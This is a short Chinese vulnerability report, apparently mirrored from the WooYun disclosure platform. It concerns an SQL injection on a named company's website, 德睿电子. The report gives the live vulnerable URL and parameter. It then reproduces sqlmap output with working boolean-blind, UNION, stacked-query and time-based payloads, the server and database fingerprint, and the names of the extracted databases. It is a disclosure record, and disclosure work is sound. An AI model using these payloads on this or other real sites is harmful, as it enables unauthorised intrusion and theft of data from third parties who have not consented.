乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-29: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-05-13: 厂商已经主动忽略漏洞,细节向公众公开
德睿电子网站存在SQL注入
注入点
http://www.dory.com.cn/AboutUs.php?whatid=1
注入证明
sqlmap identified the following injection points with a total of 26 HTTP(s) requests:---Place: GETParameter: whatid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: whatid=1 AND 2185=2185 Type: UNION query Title: MySQL UNION query (NULL) - 15 columns Payload: whatid=1 LIMIT 1,1 UNION ALL SELECT NULL, NULL, CONCAT(0x3a7174733a,0x55794873725755785251,0x3a6b766d3a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: whatid=1; SELECT SLEEP(5);-- Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: whatid=1 AND SLEEP(5)---[18:19:57] [INFO] the back-end DBMS is MySQLweb server operating system: Linux CentOS 5web application technology: Apache 2.2.3, PHP 5.2.17back-end DBMS: MySQL 5.0.11[18:19:57] [INFO] fetching database names[18:19:58] [INFO] the SQL query used returns 2 entries[18:19:58] [INFO] retrieved: "information_schema"[18:19:59] [INFO] retrieved: "sq_derui209"available databases [2]:[*] information_schema[*] sq_derui209
test
未能联系到厂商或者厂商积极拒绝